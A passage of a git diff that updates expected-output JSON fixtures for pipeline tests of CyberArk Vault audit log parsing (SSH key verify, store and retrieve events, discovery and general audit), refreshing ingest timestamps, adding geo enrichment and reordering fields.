a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json @@ -93,7 +93,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:04.451006400Z", + "ingested": "2021-12-14T14:42:33.061544998Z", "original": "\u003c5\u003e1 2021-03-25T10:04:06Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 06:04:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T10:04:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e414\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux SSH Keys\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-rhel7.cybr.com-firecall1\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eVerificationPeriod\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=rhel7.cybr.com;username=firecall1;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"firecall1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"rhel7.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Name\\\" Value=\\\"Operating System-UnixSSH-rhel7.cybr.com-root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Folder\\\" Value=\\\"Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Safe\\\" Value=\\\"Linux Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616666646\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1582315464\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 06:04:06\",\"IsoTimestamp\":\"2021-03-25T10:04:06Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"414\",\"Desc\":\"CPM Verify SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux SSH Keys\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-rhel7.cybr.com-firecall1\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"VerificationPeriod\",\"ExtraDetails\":\"address=rhel7.cybr.com;username=firecall1;\",\"Message\":\"CPM Verify SSH Key\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"firecall1\"},{\"Name\":\"Address\",\"Value\":\"rhel7.cybr.com\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"SequenceID\",\"Value\":\"2\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"ExtraPass3Name\",\"Value\":\"Operating System-UnixSSH-rhel7.cybr.com-root\"},{\"Name\":\"ExtraPass3Folder\",\"Value\":\"Root\"},{\"Name\":\"ExtraPass3Safe\",\"Value\":\"Linux Root\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616666646\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1582315464\"},{\"Name\":\"Tags\",\"Value\":\"SSH\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "414", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json index 57f90fa6c94..6b8480832aa 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-427-store-ssh-key.log-expected.json @@ -62,7 +62,7 @@ "event": { "severity": 2, "action": "store ssh key", - "ingested": "2021-12-09T13:37:04.617241200Z", + "ingested": "2021-12-14T14:42:33.244627368Z", "original": "\u003c5\u003e1 2021-03-11T16:50:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:50:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:50:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e427\u003c/MessageID\u003e\\n \u003cDesc\u003eStore SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:50:17\",\"IsoTimestamp\":\"2021-03-11T16:50:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"427\",\"Desc\":\"Store SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store SSH Key\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "427", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json index 3a02548c116..205d8cda5c7 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json @@ -7,10 +7,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -90,7 +99,7 @@ "event": { "severity": 2, "reason": "(Action: Retrieve SSH key)for fun and profit", - "ingested": "2021-12-09T13:37:04.741497400Z", + "ingested": "2021-12-14T14:42:33.374377913Z", "original": "\u003c5\u003e1 2021-03-11T17:43:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:43:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:43:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Retrieve SSH key)for fun and profit\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cUserReason\u003efor fun and profit\u003c/UserReason\u003e\\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:43:44\",\"IsoTimestamp\":\"2021-03-11T17:43:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Retrieve SSH key)for fun and profit\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"UserReason\":\"for fun and profit\",\"RetrieveAction\":\"Retrieve SSH key\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "428", "kind": "event", @@ -115,10 +124,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -201,7 +219,7 @@ "event": { "severity": 2, "reason": "(Action: Connect)testing(Connection to address: 67.43.156.15)", - "ingested": "2021-12-09T13:37:04.741505500Z", + "ingested": "2021-12-14T14:42:33.374380584Z", "original": "\u003c5\u003e1 2021-03-11T21:08:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:08:48\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:08:48Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Connect)testing(Connection to address: 67.43.156.15)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cUserReason\u003etesting\u003c/UserReason\u003e\\n \u003cRetrieveAction\u003eConnect\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n \u003cConnectionDetails\u003e\\n \u003cConnectionAddress\u003e67.43.156.15\u003c/ConnectionAddress\u003e\\n \u003c/ConnectionDetails\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:08:48\",\"IsoTimestamp\":\"2021-03-11T21:08:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Connect)testing(Connection to address: 67.43.156.15)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"UserReason\":\"testing\",\"RetrieveAction\":\"Connect\"},\"ConnectionDetails\":{\"ConnectionAddress\":\"67.43.156.15\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "428", "kind": "event", @@ -226,10 +244,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -308,7 +335,7 @@ "event": { "severity": 2, "reason": "(Action: Retrieve SSH key)", - "ingested": "2021-12-09T13:37:04.741510100Z", + "ingested": "2021-12-14T14:42:33.374381084Z", "original": "\u003c5\u003e1 2021-03-15T13:18:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:52\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:52Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Retrieve SSH key)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:52\",\"IsoTimestamp\":\"2021-03-15T13:18:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Retrieve SSH key)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"RetrieveAction\":\"Retrieve SSH key\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "428", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json index 4b6b6cb97d7..5d44024cfb6 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -46,14 +39,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "create discovery succeeded", - "ingested": "2021-12-09T13:37:05.172001500Z", + "ingested": "2021-12-14T14:42:33.851345176Z", "original": "\u003c5\u003e1 2021-03-14T12:06:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:06:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:06:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e449\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate Discovery Succeeded\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eCreate Discovery Succeeded\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eStatus:Success; Discovery:\u003cWindows discovery from ELASTIC.local\u003e; Reason:;\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate Discovery Succeeded\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:06:35\",\"IsoTimestamp\":\"2021-03-14T12:06:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"449\",\"Desc\":\"Create Discovery Succeeded\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Create Discovery Succeeded\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Status:Success; Discovery:\u003cWindows discovery from ELASTIC.local\u003e; Reason:;\",\"ExtraDetails\":\"\",\"Message\":\"Create Discovery Succeeded\",\"GatewayStation\":\"\"}}}", "code": "449", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json index f2db8d5101b..bd36a7963ec 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json @@ -76,7 +76,7 @@ "event": { "severity": 2, "action": "general audit", - "ingested": "2021-12-09T13:37:05.315103200Z", + "ingested": "2021-12-14T14:42:33.961902239Z", "original": "\u003c5\u003e1 2021-03-08T10:19:42Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 